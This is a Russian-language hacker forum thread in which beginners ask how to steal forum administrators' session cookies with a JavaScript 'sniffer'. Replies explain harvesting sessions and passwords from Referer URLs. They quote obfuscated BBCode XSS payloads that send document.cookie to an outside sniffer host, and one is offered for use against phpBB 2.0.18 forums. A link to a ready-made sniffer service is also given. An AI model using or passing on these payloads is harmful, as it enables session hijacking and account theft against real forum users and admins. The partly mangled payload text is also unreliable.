Народ, такой вопрос: Сниффером мы можем получать куки. Но только куки того процесса, где был выполнен Джаваскрипт. Следовательно, для использования сниффера, в любом случае требуется искать уязвимость, пропускающую Джаваскрипт? Тогда не очень ясен один вопрос - в статье про снифферы на Античате, неточно помню, был описан такой прием получения админских куков на форуме, как просьба посмотреть неоткрывающийся аватар (в котором сидит Js). Админу дается ссылка, и просится на нее зайти. Но вель тогда сниффер получит куки, которые относятся к новому открытому документу - странице с картинкой, и толку от этого никакого. То есть, главный вопрос: Можно ли как-нибудь использовать сниффер, если нет уязвимостей, пропускающих Js?
Можно, его использовать для получения реффера (тоесть адреса, с которого зашел чел на сниффер). Так можно воровать сессии. А бывают и такие чаты, или еще ченить, где в дресе пишется http://site/chat/?userId=1234&room=3&pwd=qwerty Из этой строки можно узнать пароль ))))))))))))))))))))))
чтобы не создавать тему спрашиваю здесь.... когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt??? очень важно, а то у меня ни разу не получалось получить файл...а точнее куки.... сасое большое, что я получаю, это ip адрес...
Ха-ха-ха-ха.... Я ща умру от смеха)))) Где ты в JS видел такое??? Например: Code: [HT*ML][co*lor=white][EM*AIL][U*RL=wj`=`][/URL][/EMA*IL][/color]` style=`background:url(javascript:document.images[1].src="http://s.netsec.ru/nofear/pic.gif?;"[B]+админ@yandex.ru.txt[/B])` Если это щас увидят знающие люди, они сдохнут со смеха )))
Мдаааааааааа!!! Ты вообще сам понял, что спросил! И че ты надеялся получить если бы ты написал вместо document.cookie - админ@yandex.ru.txt. Немного подумав я сделал вывод что ты видимо хотел получить некий файл админ@yandex.ru.txt или файл админа с yandex.ru под названием yandex.ru.txt, ХА ХА ХА!!! ОБЛОМИСЬ ИМХО!!! =) Ну и не получиться! Честно говоря с первого раза я не понял этого предложения =). Поверь мне ты получишь не только ip адресс, хотя..... наверное ТЫ ничего не получишь..... УЧИ МАТ ЧАСТЬ, ИМХО!!!!!!!!
СДОХНУТЬ МОЖНО!!!!!!!!!!)))))))))))))))))))))))))))))))))))))))))))))))))))))))) ну и ЛОЛЛЛЛЛЛЛЛЛ когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???
ну хорошо, лоханулся.... а в чем тогда проблема??? я даже на себе проверял.....пишу я нужный код, с помощью кодера (ну, ссылки на них где-то давали).....в сообщении оставляю ссылку, сам кликаю и на снифак приходит только Ip адрес жертвы.... что делать....ну помогите начинающему...все же когда-то были такими....
да на форумах.....phpbb 2.0.18 или fastbb (версию не помню, но не самаЯ последняя, где-то предпоследняя...)
http://www.[URL=http://wj.com/style...;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/URL] Вот юзай эту XSS. Ты не забыл что все они работают, ТОЛЬКО в ОСЛИКЕ ?
Вы чего - прям все родились с компом в руках? Он в этом не разбирается, зато, наверное, разбирается в пусковой части какого-нить психофазатрона альфа-частиц на молекулярном уровне... Лучше бы в двух постах объяснили на пальцах что такое снифер и зачем он.
http://antichat.ru/sniff/ вот тут объсняют популярно что такое сниффер)))там ещё есть сам сниффер и даже лог)))
